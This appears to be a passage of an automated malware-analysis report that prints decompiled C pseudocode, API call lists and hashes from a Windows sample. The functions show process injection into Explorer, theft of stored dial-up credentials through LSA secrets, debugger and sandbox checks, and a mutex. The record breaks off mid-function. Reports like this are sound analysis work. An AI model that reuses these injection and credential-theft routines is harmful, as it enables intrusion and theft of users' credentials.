                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}


                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}


                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405334() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
                                    					if( &_v264 == "55274-640-2673064-23950") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}


                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • ProductId, xrefs: 0040536B
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
                                    				char _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _v20;
                                    				union _SID_NAME_USE _v24;
                                    				void* _v28;
                                    				void _v284;
                                    				char _v540;
                                    				void* _t50;
                                    				intOrPtr _t56;
                                    				void* _t60;
                                    
                                    				_v8 = 0;
                                    				_t50 = __eax;
                                    				_push(_t60);
                                    				_push(0x407d81);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t60 + 0xfffffde8;
                                    				E00401AC0(__eax);
                                    				E00402074( &_v8, 0x100);
                                    				_v12 = 0xff;
                                    				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
                                    					_v16 = 0xff;
                                    					_v20 = 0xff;
                                    					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
                                    						_push( &_v28);
                                    						_push( &_v284);
                                    						L00407B54();
                                    						E00401CAC(_t50, _v28);
                                    						GlobalFree(_v28);
                                    					}
                                    				}
                                    				_pop(_t56);
                                    				 *[fs:eax] = _t56;
                                    				_push(E00407D88);
                                    				return E00401AC0( &_v8);
                                    			}


                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _t49;
                                    				void* _t55;
                                    
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_push(_t55);
                                    				_push(0x40b062);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff0;
                                    				E004013A4(0,  &_v16);
                                    				_t52 = E00401F48(_v16);
                                    				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    				_t37 = OpenProcess(0x1f0fff, 0, _v8);
                                    				E00401CAC( &_v20, _t17);
                                    				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
                                    				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E0040B069);
                                    				return E00401AE4( &_v20, 2);
                                    			}


                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				void* _t23;
                                    				intOrPtr _t50;
                                    				intOrPtr _t58;
                                    				void* _t59;
                                    
                                    				_t59 = __eflags;
                                    				_t55 = __esi;
                                    				_t54 = __edi;
                                    				_t41 = __ebx;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t58);
                                    				_push(0x407ef8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t58;
                                    				_push("RasDialParams!");
                                    				E00407CAC( &_v16, __ebx, __ecx);
                                    				_push(_v16);
                                    				_push(0x407f24);
                                    				E00401E10();
                                    				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
                                    				_t60 = _t23;
                                    				if(_t23 != 0) {
                                    					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
                                    					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				_pop(_t50);
                                    				 *[fs:eax] = _t50;
                                    				_push(E00407EFF);
                                    				return E00401AE4( &_v16, 2);
                                    			}


                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				_Unknown_base(*)()* _t6;
                                    				void* _t8;
                                    				void* _t14;
                                    				void* _t15;
                                    
                                    				_t14 = __ecx;
                                    				_t15 = __edx;
                                    				_t8 = __eax;
                                    				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
                                    				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
                                    			}








                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E0040562C() {
                                    				void* _t5;
                                    				struct HINSTANCE__* _t6;
                                    				intOrPtr* _t7;
                                    				intOrPtr* _t8;
                                    
                                    				_t5 = 0;
                                    				_t6 = LoadLibraryA("kernel32.dll");
                                    				if(_t6 != 0) {
                                    					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
                                    					_t7 = _t8;
                                    					if(_t8 != 0) {
                                    						_t5 =  *_t7();
                                    					}
                                    				}
                                    				return _t5;
                                    			}








                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}







                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}







                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405EAC(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
                                    				return  *_t3(_t5, _t7);
                                    			}







                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 240E0A9A
                                    • GetProcAddress.KERNEL32(?,240DBFF9), ref: 240E0AAF
                                    • VirtualProtect.KERNEL32(24080000,00001000,00000004,?,00000000), ref: 240E0B0E
                                    • VirtualProtect.KERNEL32(24080000,00001000), ref: 240E0B23
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.530063938.00000000240C4000.00000040.00000001.sdmp, Offset: 24080000, based on PE: true
                                    • Associated: 00000001.00000002.530051983.0000000024080000.00000002.00000001.sdmp
                                    • Associated: 00000001.00000002.530090141.00000000240E1000.00000004.00000001.sdmp
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
                                    				long _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) {
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(1);
                                    				return _t7;
                                    			}






                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
                                    				void* _t7;
                                    
                                    				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t7);
                                    					return 1;
                                    				} else {
                                    					CloseHandle(_t7);
                                    					return 0;
                                    				}
                                    			}





                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				struct _PROCESS_INFORMATION _v28;
